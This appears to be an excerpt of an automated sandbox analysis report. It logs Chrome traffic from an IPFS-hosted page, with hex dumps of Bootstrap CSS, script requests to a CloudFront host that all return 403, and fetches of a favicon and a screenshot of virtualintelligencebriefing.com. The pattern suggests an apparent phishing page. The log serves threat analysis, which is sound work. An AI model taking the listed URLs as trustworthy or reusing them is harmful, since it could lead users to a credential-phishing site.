                                                  2024-10-31 19:49:41 UTC1369INData Raw: 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 70 72 69 6d 61 72 79 3a 23 30 30 37 62 66 66 3b 2d 2d 73 65 63 6f 6e 64 61 72 79 3a 23 36 63 37 35 37 64 3b 2d 2d 73 75 63 63 65 73 73 3a 23 32 38 61 37 34 35 3b 2d 2d 69 6e 66 6f 3a 23 31 37 61 32 62 38 3b 2d 2d 77 61 72 6e 69 6e 67 3a 23 66 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30
                                                  Data Ascii: -dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 63 75 72 73 6f 72 3a 68 65 6c 70 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 6b 69 70 2d 69 6e 6b 3a 6e 6f 6e 65 7d 61 64 64 72 65 73 73 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74
                                                  Data Ascii: decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0;-webkit-text-decoration-skip-ink:none;text-decoration-skip-ink:none}address{margin-bottom:1rem;font-style:normal;line-height:inherit}dl,ol,ul{margin-top:0;margin-bott
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 20 2d 77 65 62 6b 69 74 2d 66 6f 63 75 73 2d 72 69 6e 67 2d 63 6f 6c 6f 72 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 72 6f 6c 65 3d 62 75 74 74 6f 6e 5d 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 73 65 6c 65 63 74 7b 77 6f 72 64 2d 77 72 61 70 3a 6e 6f 72 6d 61 6c 7d 5b 74 79 70 65 3d 62
                                                  Data Ascii: -webkit-focus-ring-color}button,input,optgroup,select,textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}button,input{overflow:visible}button,select{text-transform:none}[role=button]{cursor:pointer}select{word-wrap:normal}[type=b
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 68 32 2c 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 7d 2e 68 33 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 35 72 65 6d 7d 2e 68 34 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 68 35 2c 68 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 68 36 2c 68 36 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 7d 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 7d 2e 64 69 73 70 6c 61 79
                                                  Data Ascii: ,h3,h4,h5,h6{margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:2.5rem}.h2,h2{font-size:2rem}.h3,h3{font-size:1.75rem}.h4,h4{font-size:1.5rem}.h5,h5{font-size:1.25rem}.h6,h6{font-size:1rem}.lead{font-size:1.25rem;font-weight:300}.display
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 61 3e 63 6f 64 65 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 6b 62 64 7b 70 61 64 64 69 6e 67 3a 2e 32 72 65 6d 20 2e 34 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 32 72 65 6d 7d 6b 62 64 20 6b 62 64 7b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 37 2e 35 25 3b 63 6f 6c 6f 72 3a 23 32 31 32 35 32 39 7d 70 72 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 69
                                                  Data Ascii: word-wrap:break-word}a>code{color:inherit}kbd{padding:.2rem .4rem;font-size:87.5%;color:#fff;background-color:#212529;border-radius:.2rem}kbd kbd{padding:0;font-size:100%;font-weight:700}pre{display:block;font-size:87.5%;color:#212529}pre code{font-size:i
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 2d 6d 64 2d 31 31 2c 2e 63 6f 6c 2d 6d 64 2d 31 32 2c 2e 63 6f 6c 2d 6d 64 2d 32 2c 2e 63 6f 6c 2d 6d 64 2d 33 2c 2e 63 6f 6c 2d 6d 64 2d 34 2c 2e 63 6f 6c 2d 6d 64 2d 35 2c 2e 63 6f 6c 2d 6d 64 2d 36 2c 2e 63 6f 6c 2d 6d 64 2d 37 2c 2e 63 6f 6c 2d 6d 64 2d 38 2c 2e 63 6f 6c 2d 6d 64 2d 39 2c 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 2c 2e 63 6f 6c 2d 73 6d 2c 2e 63 6f 6c 2d 73 6d 2d 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 30 2c 2e 63 6f 6c 2d 73 6d 2d 31 31 2c 2e 63 6f 6c 2d 73 6d 2d 31 32 2c 2e 63 6f 6c 2d 73 6d 2d 32 2c 2e 63 6f 6c 2d 73 6d 2d 33 2c 2e 63 6f 6c 2d 73 6d 2d 34 2c 2e 63 6f 6c 2d 73 6d 2d 35 2c 2e 63 6f 6c 2d 73 6d 2d 36 2c 2e 63 6f 6c 2d 73 6d 2d 37 2c 2e 63 6f 6c 2d 73 6d 2d 38 2c 2e 63 6f 6c 2d 73 6d 2d 39 2c 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 2c
                                                  Data Ascii: -md-11,.col-md-12,.col-md-2,.col-md-3,.col-md-4,.col-md-5,.col-md-6,.col-md-7,.col-md-8,.col-md-9,.col-md-auto,.col-sm,.col-sm-1,.col-sm-10,.col-sm-11,.col-sm-12,.col-sm-2,.col-sm-3,.col-sm-4,.col-sm-5,.col-sm-6,.col-sm-7,.col-sm-8,.col-sm-9,.col-sm-auto,
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 63 6f 6c 2d 37 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 35 38 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 38 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33
                                                  Data Ascii: 0 0 50%;flex:0 0 50%;max-width:50%}.col-7{-ms-flex:0 0 58.333333%;flex:0 0 58.333333%;max-width:58.333333%}.col-8{-ms-flex:0 0 66.666667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-ms-flex:0 0 83.3
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 61 73 69 73 3a 30 3b 2d 6d 73 2d 66 6c 65 78 2d 70 6f 73 69 74 69 76 65 3a 31 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 31 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 32 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 66 6c 65 78 3a 30 20 30 20 35 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 33 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 33 33 2e 33 33
                                                  Data Ascii: asis:0;-ms-flex-positive:1;flex-grow:1;max-width:100%}.row-cols-sm-1>*{-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.row-cols-sm-2>*{-ms-flex:0 0 50%;flex:0 0 50%;max-width:50%}.row-cols-sm-3>*{-ms-flex:0 0 33.333333%;flex:0 0 33.333333%;max-width:33.33
                                                  2024-10-31 19:49:41 UTC1369INData Raw: 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 2d 31 3b 6f 72 64 65 72 3a 2d 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 6c 61 73 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 33 3b 6f 72 64 65 72 3a 31 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 30 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 30 3b 6f 72 64 65 72 3a 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 3b 6f 72 64 65 72 3a 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 32 3b 6f 72 64 65 72 3a 32 7d 2e 6f 72 64 65 72 2d 73 6d 2d 33 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 33 3b 6f 72 64 65 72 3a 33 7d 2e 6f 72 64 65 72 2d 73 6d 2d 34 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 34 3b 6f 72 64 65 72 3a 34
                                                  Data Ascii: t{-ms-flex-order:-1;order:-1}.order-sm-last{-ms-flex-order:13;order:13}.order-sm-0{-ms-flex-order:0;order:0}.order-sm-1{-ms-flex-order:1;order:1}.order-sm-2{-ms-flex-order:2;order:2}.order-sm-3{-ms-flex-order:3;order:3}.order-sm-4{-ms-flex-order:4;order:4


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.44974518.65.39.184432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:41 UTC696OUTGET /b1268/s/js/mesg_en.js HTTP/1.1
                                                  Host: d12y7sg0iam4lc.cloudfront.net
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:42 UTC400INHTTP/1.1 403 Forbidden
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Thu, 31 Oct 2024 19:49:41 GMT
                                                  Server: AmazonS3
                                                  X-Cache: Error from cloudfront
                                                  Via: 1.1 b6cf988ed9428ad8492255f2faaacfdc.cloudfront.net (CloudFront)
                                                  X-Amz-Cf-Pop: AMS1-P1
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  X-Amz-Cf-Id: cNChwpSGjwC2I1tVgSLqPuPIq9icv2yIM-9vaumUWSMskAgVMNiLPQ==
                                                  Vary: Origin
                                                  2024-10-31 19:49:42 UTC249INData Raw: 66 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 48 52 39 38 52 4b 48 38 43 5a 43 47 31 50 59 44 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 33 2f 39 65 55 2b 51 6a 43 31 38 63 70 71 64 2b 4d 65 43 55 44 53 6a 73 6c 58 38 6c 59 6c 38 64 65 6a 31 62 75 6d 50 77 68 76 63 61 59 41 4f 70 46 79 69 38 59 37 2b 38 43 38 30 59 65 68 45 50 38 78 2f 36 45 48 61 6b 6c 51 77 3d 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a
                                                  Data Ascii: f3<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>HR98RKH8CZCG1PYD</RequestId><HostId>3/9eU+QjC18cpqd+MeCUDSjslX8lYl8dej1bumPwhvcaYAOpFyi8Y7+8C80YehEP8x/6EHaklQw=</HostId></Error>
                                                  2024-10-31 19:49:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.44974618.65.39.184432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:41 UTC609OUTGET /b1268/s/js/pack.min.js HTTP/1.1
                                                  Host: d12y7sg0iam4lc.cloudfront.net
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:42 UTC400INHTTP/1.1 403 Forbidden
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Thu, 31 Oct 2024 19:49:42 GMT
                                                  Server: AmazonS3
                                                  X-Cache: Error from cloudfront
                                                  Via: 1.1 5e1e1cde81deec56515dcc5317501fe8.cloudfront.net (CloudFront)
                                                  X-Amz-Cf-Pop: AMS1-P1
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  X-Amz-Cf-Id: sztUECirfmaaYxFRzzltXGqMgwaYN-ISrWWmODIUUYxrqmuwRtiVTQ==
                                                  Vary: Origin
                                                  2024-10-31 19:49:42 UTC249INData Raw: 66 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 48 52 39 39 58 31 46 43 31 36 4b 35 31 4b 31 4a 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 42 6b 68 43 47 48 69 47 34 4c 72 33 45 4d 74 69 39 74 61 50 5a 71 56 62 43 43 4f 59 73 69 47 2f 46 76 58 78 49 49 52 41 55 6c 5a 6d 47 73 71 4e 2f 2f 67 37 77 66 38 62 47 4a 33 69 72 68 73 66 75 54 38 48 65 43 4a 54 61 30 51 3d 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a
                                                  Data Ascii: f3<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>HR99X1FC16K51K1J</RequestId><HostId>BkhCGHiG4Lr3EMti9taPZqVbCCOYsiG/FvXxIIRAUlZmGsqN//g7wf8bGJ3irhsfuT8HeCJTa0Q=</HostId></Error>
                                                  2024-10-31 19:49:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.44974418.65.39.184432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:41 UTC611OUTGET /b1268/s/js/authen.min.js HTTP/1.1
                                                  Host: d12y7sg0iam4lc.cloudfront.net
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:42 UTC400INHTTP/1.1 403 Forbidden
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Server: AmazonS3
                                                  Date: Thu, 31 Oct 2024 19:49:42 GMT
                                                  X-Cache: Error from cloudfront
                                                  Via: 1.1 ef674a9df28e4fc8d944ae07304fa954.cloudfront.net (CloudFront)
                                                  X-Amz-Cf-Pop: AMS1-P1
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  X-Amz-Cf-Id: SqVxpu2Z5kHuwd6G3mvYn9pz_aEZDKzXCEVDQho9BKStpuhk_g9cvg==
                                                  Vary: Origin
                                                  2024-10-31 19:49:42 UTC249INData Raw: 66 33 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 4d 65 73 73 61 67 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 48 52 39 38 56 53 50 47 31 43 32 44 48 39 56 45 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 32 68 77 53 2b 33 44 6e 45 4f 52 54 47 67 65 39 49 45 5a 56 75 56 36 79 34 73 50 74 72 73 77 65 30 31 78 2b 38 7a 77 30 6d 53 78 45 61 35 30 34 6f 36 76 6b 6f 51 75 59 55 79 7a 34 70 53 75 64 6f 30 7a 55 44 2b 64 2b 4b 64 51 3d 3c 2f 48 6f 73 74 49 64 3e 3c 2f 45 72 72 6f 72 3e 0d 0a
                                                  Data Ascii: f3<?xml version="1.0" encoding="UTF-8"?><Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>HR98VSPG1C2DH9VE</RequestId><HostId>2hwS+3DnEORTGge9IEZVuV6y4sPtrswe01x+8zw0mSxEa504o6vkoQuYUyz4pSudo0zUD+d+KdQ=</HostId></Error>
                                                  2024-10-31 19:49:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449747142.250.185.1004432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:44 UTC779OUTGET /s2/favicons?domain=virtualintelligencebriefing.com HTTP/1.1
                                                  Host: www.google.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:44 UTC503INHTTP/1.1 301 Moved Permanently
                                                  Location: https://t0.gstatic.com/faviconV2?client=SOCIAL&type=FAVICON&fallback_opts=TYPE,SIZE,URL&url=http://virtualintelligencebriefing.com&size=16
                                                  Content-Type: text/html; charset=UTF-8
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 31 Oct 2024 19:49:44 GMT
                                                  Expires: Thu, 31 Oct 2024 20:19:44 GMT
                                                  Cache-Control: public, max-age=1800
                                                  Server: sffe
                                                  Content-Length: 351
                                                  X-XSS-Protection: 0
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close
                                                  2024-10-31 19:49:44 UTC351INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 30 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 56 32 3f 63 6c 69 65 6e 74 3d 53 4f 43 49 41 4c 26 61 6d 70 3b 74 79 70 65 3d 46 41 56 49 43 4f 4e 26 61 6d 70 3b 66 61 6c 6c 62 61 63 6b 5f 6f 70 74 73 3d 54 59 50 45 2c
                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://t0.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.4497503.230.32.2004432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:49:44 UTC738OUTGET /get/65490-1671030344805-37a36e07674665dbe1105f1044aab44d/width/1200/https://virtualintelligencebriefing.com HTTP/1.1
                                                  Host: image.thum.io
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-31 19:49:44 UTC268INHTTP/1.1 403
                                                  Date: Thu, 31 Oct 2024 19:49:44 GMT
                                                  Content-Type: image/png
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  Cache-Control: no-cache, no-store, must-revalidate
